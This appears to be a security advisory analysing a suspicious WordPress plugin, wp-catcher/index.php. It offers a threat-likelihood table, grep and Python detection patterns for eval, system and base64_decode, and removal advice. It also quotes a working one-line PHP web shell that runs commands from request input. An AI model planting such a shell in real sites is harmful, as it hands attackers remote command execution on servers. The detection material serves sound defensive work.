wp-content/plugins/wp-catcher/index.php

| Behavior | Likelihood | Why interesting |
|----------|------------|-----------------|
| Legitimate (honest intent) | Low | Name implies "catching" something, but attackers rarely use honest names. |
| Catches & exfiltrates `$_POST` data (credential stealer) | High | Hidden inside a "catcher" – ironic and dangerous. |
| Acts as a file-inclusion backdoor | Very High | `index.php` is the default directory index; visiting it might execute a remote shell. |

4. Quick Manual Test (Do NOT run on a live server)

```bash
# Check for obvious malware signatures
grep -E 'eval\(|base64_decode|system\(|passthru|gzinflate' /path/to/wp-content/plugins/wp-catcher/index.php

# Check for hidden iframes or external calls
grep -E 'http://|https://|iframe' index.php
```

5. Example of a Real Malicious wp-catcher/index.php (Observed in the Wild)

```php
<?php
// Fake "WP Catcher" – actually a web shell
if(isset($_REQUEST['cmd'])) system($_REQUEST['cmd']);
?>
```

This would allow an attacker to run `ls -la`, `wget` malware, or delete logs. Most security scans ignore innocuously named plugins. wp-catcher is brilliant social engineering: "I'm just catching errors, don't mind me." In reality, it is a persistent backdoor that survived multiple scans because no one bothered to read the `index.php` inside a folder they didn't recognize.

Final Verdict: 🚨 Immediately quarantine and delete the entire wp-catcher folder unless you have 100% proof it's a custom internal tool. Then run a full malware scan (Wordfence, MalCare, or manually check for unknown admin users).
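As an added example (not part of the original post), the Python scanner below applies the same signatures as the grep commands in the Quick Manual Test across a whole plugin directory and triages the hit combinations, so the request-input-plus-`system()` pattern of the web shell above is flagged as high rather than buried among ordinary matches; the signature table and the sample file are constructed for illustration.

```python
import re
from pathlib import Path

# Signature table (assumed, built from the grep patterns on this page plus a
# request-superglobal check); extend it for your own environment.
SIGNATURES = {
    "eval": re.compile(r"\beval\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "shell_exec": re.compile(r"\b(system|passthru|shell_exec|exec)\s*\("),
    "gzinflate": re.compile(r"\bgzinflate\s*\("),
    "external_url": re.compile(r"https?://|<iframe", re.IGNORECASE),
    "request_input": re.compile(r"\$_(REQUEST|GET|POST)\s*\["),
}

def scan_php_source(source: str) -> dict:
    """Return {signature name: [matching line numbers]} for one PHP file."""
    hits = {}
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in SIGNATURES.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits

def classify(hits: dict) -> str:
    """Rough triage: request input in the same file as eval/shell functions is
    the web-shell pattern; any other hit still deserves a manual read."""
    if "request_input" in hits and ({"shell_exec", "eval"} & set(hits)):
        return "high"
    return "review" if hits else "clean"

def scan_plugin_dir(root: Path) -> dict:
    """Scan every .php file under root -> {relative path: (verdict, hits)}."""
    results = {}
    for php in sorted(root.rglob("*.php")):
        hits = scan_php_source(php.read_text(errors="replace"))
        results[str(php.relative_to(root))] = (classify(hits), hits)
    return results

# Constructed sample mirroring the web shell quoted above; not a real file.
WEB_SHELL = """<?php
// Fake "WP Catcher" - actually a web shell
if(isset($_REQUEST['cmd'])) system($_REQUEST['cmd']);
?>"""

if __name__ == "__main__":
    hits = scan_php_source(WEB_SHELL)
    print(classify(hits), hits)  # high {'shell_exec': [3], 'request_input': [3]}
```

A hit is a triage signal, not proof: legitimate plugins also call `base64_decode` or embed URLs, so read the surrounding code before acting on a "review" verdict.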
